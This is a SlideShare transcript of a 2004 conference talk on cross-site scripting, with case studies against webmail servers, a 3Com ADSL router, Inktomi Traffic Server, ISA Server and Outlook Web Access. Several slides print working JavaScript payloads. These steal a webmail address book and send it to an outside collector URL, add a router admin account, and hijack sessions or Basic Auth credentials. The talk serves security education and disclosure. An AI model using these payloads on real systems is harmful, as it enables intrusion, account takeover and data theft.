SlideShare a Scribd company logo

FIST Conference March 2004 XSS Presentation

Download as PPT, PDF
Conferencias FIST
Conferencias FIST
Technology
1 of 36
FIST Conference March 2004 Not only a XSS Toni Cortès Martínez Infohacking Research
GUIDELINE  Guideline  Introduction  XSS Today  Let’s see some XSS Infohacking Research 2 Not O
Introduction  What’s this?  XSS?  How it works?  Where it works?  Application level security.  OK, but it’s only a XSS. Infohacking Research 3 Not O
XSS  XSS (common attacks)  When somebody can exploit user inputs to get a non expected response.  The error it’s usually due to a poor filtering on user inputs and/or on the output from dynamically generated pages.  This could allow access to something restricted to user, for example: session credentials (cookies, session Id’s, etc.) Infohacking Research 4 Not O
How it works  How it work’s Attacker must trick the victim to make a special HTTP request.  Usually exploited on web environment: 1) Webmails 2) Web forums 3) Any web application (dynamic content) that allows user interaction  Other applications that render some output in HTML (log viewers, mail clients)“HTML inyection”. (like ILLC techniques)  Exploits a non secure programming methodology.  The attacker usually wants the victim to do something:  Sends out some cookie (session or permanent)  Make an HTTP request for you ;)  The goal of XSS: We are on the victim environment. Infohacking Research 5 Not O
How it works  How it works, example  We found a flaw on a server (ex: online bank with email service)  Construct a special request to explot this flaw (XSS), and obtain user credentials.  Send a message to the victim (with window.open, img src, etc.)  Wait for the user access and get the session track cookie.  Access to the online bank with user credentials (stolen cookie)  Now we are this user for a few time. Infohacking Research 6 Not O
Where it works  Where it Works?  Any dynamic generated content dependant on user’s input it’s a potential XSS security hole.  Enter your name: Toni  Hi Toni  Simple example of explotation on a dynamic page:  Enter your name: Toni<script>alert(‘Hello XSS’)</script>  Hi Toni Infohacking Research 7 Not O
Application level security  Nowadays, the application level security is one of the computer challenges.  Application level firewalls like HIVE or layer 7 filters.  Client side security it’s out of control for webmasters.  Servers can only do their best trying to filter any data coming from client side.  Fact: most of the XSS based attacks and vulnerabilities are easy to exploit.  No special skills are needed -> script kiddies.  XSS is useful to impersonate a user but doesn’t provide a direct or easy way of controlling a computer…umm, well, you still can do lot of things ;-) Infohacking Research 8 Not O
OK, but it’s only a XSS.  OK, but it’s only a XSS…  Yes, XSS attacks seem to be harmless by itself, but they could open other attack vectors.  We can gain access to a web-admin tool. (IIS 6.0 Web Admin XSS vulnerability)  XSS, breaks with old HTTP session tracking methods: use of ID’s on the URL, cookies and also source IP based authentication. (Iplanet Messaging Server XSS vulnerability)  Combination of XSS with other flaws to launch a more complex attack: -HOTMAIL XSS and AV bypass -Microsoft User Domain Credendials access via OWA XSS (via XST) Infohacking Research 9 Not O
XSS Today  XSS today  XSS, next generation attacks.  Proof of concept: HTTP redirection  XSS based worms & trojans  XSS worm  XSS trojan  Anyone could be affected by XSS Infohacking Research 10 Not O
XSS Next Generation  XSS next generation attacks.  HTTP response redirection (information leak) (Zeus Web Admin XSS)  HTTP bouncing (Full interactive) … under construction  Infohacking Research 11 Not O
HTTP Redirection  Proof of concept: HTTP redirection  Example of an evil link that steals address book of the victim ‘s webmail: http://<target>/vulnerable.cgi?variable=<script>function%20pedo(){var %20xmlHttp%20=%20new %20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET","http://<t arget>/address_book.cgi",false);xmlHttp.send();xmlDoc=xmlHttp.respons eText;window.open(“http://www.infohacking.com/data_collector.php? response=“+xmlDoc);} pedo();</script> Infohacking Research 12 Not O
HTTP Redirection  Which means: http://<target>/vulnerable.cgi?variable= (server path to script inyection) <script> function pedo() {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); xmlHttp.open("GET","http://<target>/address_book.cgi",false); // MAKE REQUEST xmlHttp.send(); xmlDoc=xmlHttp.responseText; // STORE RESPONSE window.open(“http://<attacker_site>/“+xmlDoc);} // SEND RESPONSE TO ATTACKER pedo(); </script> Note: we use “window.open” to send response in order to bypass “xmlHttp.open” security restrictions. Infohacking Research 13 Not O
XSS based worms & trojans  General “features”  Spreading trough webmail servers  Self decrypting script routine  Can modify permanent cookies (trojan)  Can force session logout (D.o.S.)  Can impersonate the user  Can steal information (mail content, address book, etc)  Hard to be detected by AV software (encrypted payload)  If no user action is needed (as XSS on some field of the mail) then the spreading will be very fast! Infohacking Research 14 Not O
XSS worm  How it works:  Once executed, the script will self decrypt and try to detect the source (Hotmail, Yahoo, Terra, …) or the webmail software (Iplanet, etc). It can be done with a simple “document.URL”, and comparing with some patterns.  If the source is known try to get address book  Filter only webmail addresses  Auto send routine Infohacking Research 15 Not O
XSS trojan  How it works:  Once executed, the script will self decrypt and try to set a permanent cookie (will be stored on victim’s hard disk)  The modified cookie could change some option: it can set Chinese language as default ;-) (D.o.S.)  The modified cookie could redirect the victim to some place on the server that is controlled by the attacker (changing some profile setting in the cookie) As worms, trojan could try to spread away… Infohacking Research 16 Not O
Anyone can be affected by XSS  Recent example: ViewCVS.py Affected sites: Sorceforge.net, Apache.org, Iptables.org. Those sites are well known to everybody, are probably they are managed by security concerned people… … anyway, they still can be exposed to XSS risks… Infohacking Research 17 Not O
Sourceforge.net Infohacking Research 18 Not O
Apache.org Infohacking Research 19 Not O
Iptables.org Infohacking Research 20 Not O
XSS Examples  Some XSS examples from Infohacking Research  3Com 812 ADSL router -> we add a new admin  Inktomi Traffic Server -> all user vulnerables by this XSS  Iplanet Messaging Server -> session hijack  Microsoft ISA Server ->  OWA XSS -> Access to user credentials Infohacking Research 21 Not O
XSS on 3com ADSL router  There is a lot of XSS present on the OCR812  http://<ip_of_OCR812>/<script>document.write("<b>WE_CAN_I NJECT_CODE</b>")</script> Infohacking Research 22 Not O
XSS on 3com ADSL router  With XSS we can insert new users to our router  We can use windows.open, or <img src=..> to make our special request  / Forms/admin_telnet_add"+String.fromCharCode(63)+"uumUserN ame=infohacking&uumUserPassword= Infohacking Research 23 Not O
XSS on 3com ADSL router  We can make the complete process if we know IP, user and password (by example, old admin) <html> <img src="<ip_or_name_of_OCR812>/legalizacion_marihuana.jpg"> <script type="text/javascript"> var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP") xmlHttp.open("GET", "<YOUR_FUCKING_REQUEST>,false) xmlHttp.setRequestHeader("Authorization:", "Basic User:Password(base64 encoded)") xmlHttp.send() </script> </html> Infohacking Research 24 Not O
Inktomi Traffic Server XSS  Inktomi Traffic Server is a proxy cache used on several countryes by ISP  Also know in Spain as “Proxy cache de Telefónica”  A special request by a client passing through the Inktomi Traffic- Server causes an error page generated by the proxy. This dynamic error page is vulnerable to Cross Site Scripting...  Indirectly any server whose clients come trough the Traffic- Server and using cookies to track sessions are "vulnerable".  The client making the request IS UNABLE to distinguish what domain generated this code... Infohacking Research 25 Not O
Inktomi Traffic Server XSS  Exploit?  We test it over 5.5.1 version.  Only need configure a proxy on ANY IP with port 80.  Make a special request. http://<spoofed_domain>:443/</em><script>alert()</script> We can see the script executed on our browser, “generated” by the spoofed domain. Now, we can access to cookies, and everything, like man in the middle attack. Infohacking Research 26 Not O
Iplanet messaging server XSS  This webmail, Iplanet messaging server allow us hijack the SID.  This server allows "online" opening of file attachments. This means that any html file will be opened by the client browser in the IPlanet webmail domain context. Wonderful XSS ;-) Now we can explode this XSS with a html attach. With document.URL we obtain the SID and userid (located on the URL) With the SID, we gain access to all attach. http://<iplanet_host>/attach/file.html? sid=XYXYXYXYXYXYXY&mbox=INBOX&uid=XXXXX &number=2&filename=file.html Infohacking Research 27 Not O
Iplanet messaging server XSS  But this is not easy…. Iplanet webmail include a IP session tracking.  When we can use the hijacked SID?  If we are near the victim, behind a NAT device, we can access with his SID.  We can stole the session to all people who access trough a transparent proxy (like transparent proxy devices).  Or we can create a script to force user make request and redirect to us. Of course… they don’t see anything… (see above) Note: a lot of web server use the same session-cookie on both http and https domains. (This note is for the online bank developers). Infohacking Research 28 Not O
Microsoft ISA Server XSS  This example shows an XSS exploited using headers  When we try to go an unreachable url trought ISA Server. ISA generate an error page, showing some data (the content of “via header”).  We fix this header.  Now we can request a non-existent URL into an existent domain. (usually server use the same cookie on all his domain)  Steal cookies   Access.  We don’t need a flaw on the server code. Use ISA Server instead. Infohacking Research 29 Not O
ISA Server Exploit <html> <body> <script type="text/javascript"> alert("Click OK then wait for a few seconds...") var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP") xmlHttp.open("GET", "http://www.infohacking.com:113", false) xmlHttp.setRequestHeader("Via", "CODE_INJECTED_IN_VIA_HEADER<script>alert ("ISA_SERVER_XSS_by_INFOHACKING")</script>") xmlHttp.send() xmlDoc=xmlHttp.responseText document.write(xmlHttp.responseText) </script> </body> </html> Infohacking Research 30 Not O
OWA XSS  What we have here?  With OWA you can see an HTML formatted e-mail  A user must click on a special link for this purpose in the webmail interface, and an alert will pop-up.  To avoid people executing malicious content in the client browser, the OWA will try to filter the content of the mail. Good, but… no enough. Infohacking Research 31 Not O
Disabling OWA filtering  The URL to view an HTML formatted mail is something like this: http://<IP_or_name_of_the_server>/exchange/<username>/<inbox_name>/<su bject>.EML/1_multipart/2_text.htm?Security=1 Good name for a parameter, other name maybe “change_this_for_fucking_us”  We only need to quit this parameter, and OWA don’t apply the filter. Infohacking Research 32 Not O
OWA XSS  Obtaining data to create our special link.  We need IP or hostname of the server, user name and subject.  All this we can found on the “referer” header of an HTTP request coming from a link in the body of message. <img src="http://<site_of_the_attacker">  Now with referrer, we can send our attack.  We have the IP or hostname of server (from referrer)  We have the user name (from referer)  We know the subject  We create a link in the body of message, without the “security” parameter. (link to the same message without security parameter) Infohacking Research 33 Not O
OWA, Stolen credentials  Nothing else?  OWA uses cookies to track the HTTP session, but also uses "Basic Auth" for... more security? ;-)  This “Basic Auth” (-> base64 encoded user:passwd) contains the user credentials for this domain.  To access the "Basic Auth" header, the easiest way is via an http "TRACE" request...and the IIS (Internet Information Server) by default will allow those kind of requests. Infohacking Research 34 Not O
XSS  That’s all folks?? Of course, as always, imagination of the attacker is the only limit... much more fun is possible. Thanks For Your attention. Infohacking Research 35 Not O
FIST Conference March 2004 Not only a XSS © Toni Cortes Martinez & Hugo Vazquez Carames Infohacking Research Barcelona, 7 May 2004

Recommended

Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Matt Johansen
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Jeremiah Grossman
 
Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Jeremiah Grossman
 
New web attacks-nethemba
New web attacks-nethembaNew web attacks-nethemba
New web attacks-nethembaOWASP (Open Web Application Security Project)
 
Practical web-attacks2
Practical web-attacks2Practical web-attacks2
Practical web-attacks2OWASP (Open Web Application Security Project)
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectorsShreeraj Shah
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingDilan Warnakulasooriya
 

Recommended

Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Matt Johansen
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Jeremiah Grossman
 
Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Jeremiah Grossman
 
New web attacks-nethemba
New web attacks-nethembaNew web attacks-nethemba
New web attacks-nethembaOWASP (Open Web Application Security Project)
 
Practical web-attacks2
Practical web-attacks2Practical web-attacks2
Practical web-attacks2OWASP (Open Web Application Security Project)
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectorsShreeraj Shah
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingDilan Warnakulasooriya
 
Sandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorageSandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStoragetomasperezv
 
Web Security: A Primer for Developers
Web Security: A Primer for DevelopersWeb Security: A Primer for Developers
Web Security: A Primer for DevelopersMike North
 
The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platformskosborn
 
Web Security 101
Web Security 101Web Security 101
Web Security 101Michael Peters
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
Web browser privacy and security
Web browser privacy and security Web browser privacy and security
Web browser privacy and security amiable_indian
 
Yihan Lian & Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]
Yihan Lian & Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]Yihan Lian & Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]
Yihan Lian & Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]RootedCON
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Oles Seheda
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front endErlend Oftedal
 
Security vulnerabilities - 2018
Security vulnerabilities - 2018Security vulnerabilities - 2018
Security vulnerabilities - 2018Marius Vorster
 
Jwt Security
Jwt SecurityJwt Security
Jwt SecuritySeid Yassin
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyKrishna T
 
JSFoo Chennai 2012
JSFoo Chennai 2012JSFoo Chennai 2012
JSFoo Chennai 2012Krishna T
 
Web Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteWeb Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteAndrew Sorensen
 
WhiteHat Security "Website Security Statistics Report" (Q1'09)
WhiteHat Security "Website Security Statistics Report" (Q1'09)WhiteHat Security "Website Security Statistics Report" (Q1'09)
WhiteHat Security "Website Security Statistics Report" (Q1'09)Jeremiah Grossman
 
Front end-security
Front end-securityFront end-security
Front end-securityMiao Siyu
 
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012jakobkorherr
 
Understanding JWT Exploitation
Understanding JWT ExploitationUnderstanding JWT Exploitation
Understanding JWT ExploitationAkshaeyBhosale
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsSimon Willison
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingn|u - The Open Security Community
 
Real web-attack-scenario
Real web-attack-scenarioReal web-attack-scenario
Real web-attack-scenarioOWASP (Open Web Application Security Project)
 

More Related Content

What's hot

Sandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorageSandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStoragetomasperezv
 
Web Security: A Primer for Developers
Web Security: A Primer for DevelopersWeb Security: A Primer for Developers
Web Security: A Primer for DevelopersMike North
 
The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platformskosborn
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
Web browser privacy and security
Web browser privacy and security Web browser privacy and security
Web browser privacy and security amiable_indian
 
Yihan Lian & Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]
Yihan Lian & Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]Yihan Lian & Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]
Yihan Lian & Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]RootedCON
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Oles Seheda
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front endErlend Oftedal
 
Security vulnerabilities - 2018
Security vulnerabilities - 2018Security vulnerabilities - 2018
Security vulnerabilities - 2018Marius Vorster
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyKrishna T
 
JSFoo Chennai 2012
JSFoo Chennai 2012JSFoo Chennai 2012
JSFoo Chennai 2012Krishna T
 
Web Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteWeb Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteAndrew Sorensen
 
WhiteHat Security "Website Security Statistics Report" (Q1'09)
WhiteHat Security "Website Security Statistics Report" (Q1'09)WhiteHat Security "Website Security Statistics Report" (Q1'09)
WhiteHat Security "Website Security Statistics Report" (Q1'09)Jeremiah Grossman
 
Front end-security
Front end-securityFront end-security
Front end-securityMiao Siyu
 
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012jakobkorherr
 
Understanding JWT Exploitation
Understanding JWT ExploitationUnderstanding JWT Exploitation
Understanding JWT ExploitationAkshaeyBhosale
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsSimon Willison
 

What's hot (20)

Sandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorageSandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorage
 
Web Security: A Primer for Developers
Web Security: A Primer for DevelopersWeb Security: A Primer for Developers
Web Security: A Primer for Developers
 
The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platforms
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Web browser privacy and security
Web browser privacy and security Web browser privacy and security
Web browser privacy and security
 
Yihan Lian & Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]
Yihan Lian & Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]Yihan Lian & Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]
Yihan Lian & Zhibin Hu - Smarter Peach: Add Eyes to Peach Fuzzer [rooted2017]
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front end
 
Security vulnerabilities - 2018
Security vulnerabilities - 2018Security vulnerabilities - 2018
Security vulnerabilities - 2018
 
Jwt Security
Jwt SecurityJwt Security
Jwt Security
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin Policy
 
JSFoo Chennai 2012
JSFoo Chennai 2012JSFoo Chennai 2012
JSFoo Chennai 2012
 
Web Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteWeb Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your website
 
WhiteHat Security "Website Security Statistics Report" (Q1'09)
WhiteHat Security "Website Security Statistics Report" (Q1'09)WhiteHat Security "Website Security Statistics Report" (Q1'09)
WhiteHat Security "Website Security Statistics Report" (Q1'09)
 
Front end-security
Front end-securityFront end-security
Front end-security
 
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012
 
Understanding JWT Exploitation
Understanding JWT ExploitationUnderstanding JWT Exploitation
Understanding JWT Exploitation
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentals
 

Similar to FIST Conference March 2004 XSS Presentation

Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Nabin Dutta
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
 
Xss 101 by-sai-shanthan
Xss 101 by-sai-shanthanXss 101 by-sai-shanthan
Xss 101 by-sai-shanthanRaghunath G
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Jay Nagar
 
Xss.e xopresentation from eXo SEA
Xss.e xopresentation from eXo SEAXss.e xopresentation from eXo SEA
Xss.e xopresentation from eXo SEAThuy_Dang
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Ikhade Maro Igbape
 
Inside Out Hacking - Bypassing Firewall
Inside Out Hacking - Bypassing FirewallInside Out Hacking - Bypassing Firewall
Inside Out Hacking - Bypassing Firewallamiable_indian
 
White paper screen
White paper screenWhite paper screen
White paper screeneltincho89
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)OWASP Khartoum
 
XST - Cross Site Tracing
XST - Cross Site TracingXST - Cross Site Tracing
XST - Cross Site TracingMagno Logan
 
Security testing for web developers
Security testing for web developersSecurity testing for web developers
Security testing for web developersmatthewhughes
 
What is xss, blind xss and xploiting google gadgets
What is xss, blind xss and xploiting google gadgetsWhat is xss, blind xss and xploiting google gadgets
What is xss, blind xss and xploiting google gadgetsZiv Ginsberg
 
STORED XSS IN DVWA
STORED XSS IN DVWASTORED XSS IN DVWA
STORED XSS IN DVWARutvik patel
 

Similar to FIST Conference March 2004 XSS Presentation (20)

Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Real web-attack-scenario
Real web-attack-scenarioReal web-attack-scenario
Real web-attack-scenario
 
XSS.pdf
XSS.pdfXSS.pdf
XSS.pdf
 
XSS.pdf
XSS.pdfXSS.pdf
XSS.pdf
 
Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Cross Site Scripting(XSS)
Cross Site Scripting(XSS)
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )
 
Xss 101
Xss 101Xss 101
Xss 101
 
Xss 101 by-sai-shanthan
Xss 101 by-sai-shanthanXss 101 by-sai-shanthan
Xss 101 by-sai-shanthan
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
 
Xss.e xopresentation from eXo SEA
Xss.e xopresentation from eXo SEAXss.e xopresentation from eXo SEA
Xss.e xopresentation from eXo SEA
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
 
Inside Out Hacking - Bypassing Firewall
Inside Out Hacking - Bypassing FirewallInside Out Hacking - Bypassing Firewall
Inside Out Hacking - Bypassing Firewall
 
White paper screen
White paper screenWhite paper screen
White paper screen
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)
 
XST - Cross Site Tracing
XST - Cross Site TracingXST - Cross Site Tracing
XST - Cross Site Tracing
 
Security testing for web developers
Security testing for web developersSecurity testing for web developers
Security testing for web developers
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
What is xss, blind xss and xploiting google gadgets
What is xss, blind xss and xploiting google gadgetsWhat is xss, blind xss and xploiting google gadgets
What is xss, blind xss and xploiting google gadgets
 
STORED XSS IN DVWA
STORED XSS IN DVWASTORED XSS IN DVWA
STORED XSS IN DVWA
 
XSS Injection Vulnerabilities
XSS Injection VulnerabilitiesXSS Injection Vulnerabilities
XSS Injection Vulnerabilities
 

More from Conferencias FIST

Seguridad en Entornos Web Open Source
Seguridad en Entornos Web Open SourceSeguridad en Entornos Web Open Source
Seguridad en Entornos Web Open SourceConferencias FIST
 
Las Evidencias Digitales en la Informática Forense
Las Evidencias Digitales en la Informática ForenseLas Evidencias Digitales en la Informática Forense
Las Evidencias Digitales en la Informática ForenseConferencias FIST
 
Evolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFiEvolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFiConferencias FIST
 
El Information Security Forum
El Information Security ForumEl Information Security Forum
El Information Security ForumConferencias FIST
 
Inseguridad en Redes Wireless
Inseguridad en Redes WirelessInseguridad en Redes Wireless
Inseguridad en Redes WirelessConferencias FIST
 
Mas allá de la Concienciación
Mas allá de la ConcienciaciónMas allá de la Concienciación
Mas allá de la ConcienciaciónConferencias FIST
 
Riesgo y Vulnerabilidades en el Desarrollo
Riesgo y Vulnerabilidades en el DesarrolloRiesgo y Vulnerabilidades en el Desarrollo
Riesgo y Vulnerabilidades en el DesarrolloConferencias FIST
 
Demostracion Hacking Honeypot y Análisis Forense
Demostracion Hacking Honeypot y Análisis ForenseDemostracion Hacking Honeypot y Análisis Forense
Demostracion Hacking Honeypot y Análisis ForenseConferencias FIST
 

More from Conferencias FIST (20)

Seguridad en Open Solaris
Seguridad en Open SolarisSeguridad en Open Solaris
Seguridad en Open Solaris
 
Seguridad en Entornos Web Open Source
Seguridad en Entornos Web Open SourceSeguridad en Entornos Web Open Source
Seguridad en Entornos Web Open Source
 
Spanish Honeynet Project
Spanish Honeynet ProjectSpanish Honeynet Project
Spanish Honeynet Project
 
Seguridad en Windows Mobile
Seguridad en Windows MobileSeguridad en Windows Mobile
Seguridad en Windows Mobile
 
SAP Security
SAP SecuritySAP Security
SAP Security
 
Que es Seguridad
Que es SeguridadQue es Seguridad
Que es Seguridad
 
Network Access Protection
Network Access ProtectionNetwork Access Protection
Network Access Protection
 
Las Evidencias Digitales en la Informática Forense
Las Evidencias Digitales en la Informática ForenseLas Evidencias Digitales en la Informática Forense
Las Evidencias Digitales en la Informática Forense
 
Evolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFiEvolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFi
 
El Information Security Forum
El Information Security ForumEl Information Security Forum
El Information Security Forum
 
Criptografia Cuántica
Criptografia CuánticaCriptografia Cuántica
Criptografia Cuántica
 
Inseguridad en Redes Wireless
Inseguridad en Redes WirelessInseguridad en Redes Wireless
Inseguridad en Redes Wireless
 
Mas allá de la Concienciación
Mas allá de la ConcienciaciónMas allá de la Concienciación
Mas allá de la Concienciación
 
Security Metrics
Security MetricsSecurity Metrics
Security Metrics
 
PKI Interoperability
PKI InteroperabilityPKI Interoperability
PKI Interoperability
 
Wifislax 3.1
Wifislax 3.1Wifislax 3.1
Wifislax 3.1
 
Network Forensics
Network ForensicsNetwork Forensics
Network Forensics
 
Riesgo y Vulnerabilidades en el Desarrollo
Riesgo y Vulnerabilidades en el DesarrolloRiesgo y Vulnerabilidades en el Desarrollo
Riesgo y Vulnerabilidades en el Desarrollo
 
Demostracion Hacking Honeypot y Análisis Forense
Demostracion Hacking Honeypot y Análisis ForenseDemostracion Hacking Honeypot y Análisis Forense
Demostracion Hacking Honeypot y Análisis Forense
 
Security Maturity Model
Security Maturity ModelSecurity Maturity Model
Security Maturity Model
 

Recently uploaded

My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
